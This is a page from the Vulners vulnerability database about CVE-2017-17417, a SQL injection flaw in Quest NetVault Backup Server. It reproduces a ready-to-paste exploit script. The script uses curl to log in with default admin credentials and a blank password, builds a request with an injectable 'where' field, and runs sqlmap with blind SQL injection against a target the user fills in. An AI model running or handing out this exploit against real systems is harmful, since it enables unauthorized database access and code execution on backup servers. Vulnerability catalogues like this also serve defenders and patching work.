Vulners
Lucene search
Quest NetVault Backup Server Code Execution / SQL Injection
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Quest NetVault Backup Server < 11.4.5 - SQL Injection / Remote Code Execution Vulnerability | 22 Feb 201900:00 | – | zdt |
 | CVE-2017-17417 | 8 Feb 201818:29 | – | attackerkb |
 | CVE-2017-17417 | 17 Jul 202414:31 | – | circl |
 | Quest NetVault Backup SQL Injection Vulnerability (CNVD-2017-37644) | 20 Dec 201700:00 | – | cnvd |
 | CVE-2017-17417 | 8 Feb 201818:00 | – | cve |
 | CVE-2017-17417 | 8 Feb 201818:00 | – | cvelist |
 | Quest NetVault Backup Server < 11.4.5 - Process Manager Service SQL Injection / Remote Code Execution | 22 Feb 201900:00 | – | exploitdb |
 | Quest NetVault Backup Server 11.4.5 - Process Manager Service SQL Injection Remote Code Execution | 22 Feb 201900:00 | – | exploitpack |
 | Quest NetVault Backup Server < 11.4.5 Process Manager Service SQL Injection Remote Code Execution Vulnerability (ZDI-17-982) | 14 Dec 201800:00 | – | nessus |
 | CVE-2017-17417 | 8 Feb 201818:29 | – | nvd |
10
`# Exploit Title: Quest NetVault Backup Server < 11.4.5 Process Manager Service SQL Injection Remote Code Execution Vulnerability (ZDI-17-982)
# Date: 2-21-2019
# Exploit Author: credit goes to rgod for finding the bug
# Version: Quest NetVault Backup Server < 11.4.5
# CVE : CVE-2017-17417
# There is a decent description of the bug here: https://www.zerodayinitiative.com/advisories/ZDI-17-982/
# but no PoC, hence this submission. Also the description states that authentication is not required.
# I did not find the auth bypass, but the target was using default credz
# of admin and a blank password.
#
# "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
# of Quest NetVault Backup. Authentication is not required to exploit this vulnerability.
#
# The specific flaw exists within the handling of NVBUPhaseStatus Acknowledge method requests.
# The issue results from the lack of proper validation of a
# user-supplied string before using it to construct SQL queries. An attacker can leverage this
# vulnerability to execute code in the context of the underlying database."
# Fill out the variables then copy paste everything below this line into a kali terminal
#target ip address
target=x.x.x.x
#target port
port=8443
#username
username=admin
#password is blank by default!
password=
cookie=$(curl -i -s -k -X $'POST' -H $'Content-Length: 109' -H $'Content-Type: application/json-rpc; charset=UTF-8' --data-binary "{\"jsonrpc\":\"2.0\",\"method\":\"Logon\",\"params\":{\"OutputFormat\":\"pretty\",\"UserName\":\"$username\",\"Password\":\"$password\"},\"id\":1}" "https://$target:$port/query" | grep SessionCookie | cut -d '"' -f4)
cat > dellSqlmap <<EOF
POST /query HTTP/1.1
Host: $target:$port
Connection: close
Content-Length: 129
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
SessionCookie: $cookie
Content-Type: application/json-rpc; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{"jsonrpc":"2.0","method":"GET","params":{"classname":"NVBUPhaseStatus","updates":"none","where":"1=1*"},"id":1}
EOF
sqlmap -r dellSqlmap --force-ssl --level=5 --dbms=postgresql --prefix='' --suffix='' --test-filter='AND boolean-based blind - WHERE or HAVING clause' --batch
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Feb 2019 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.15977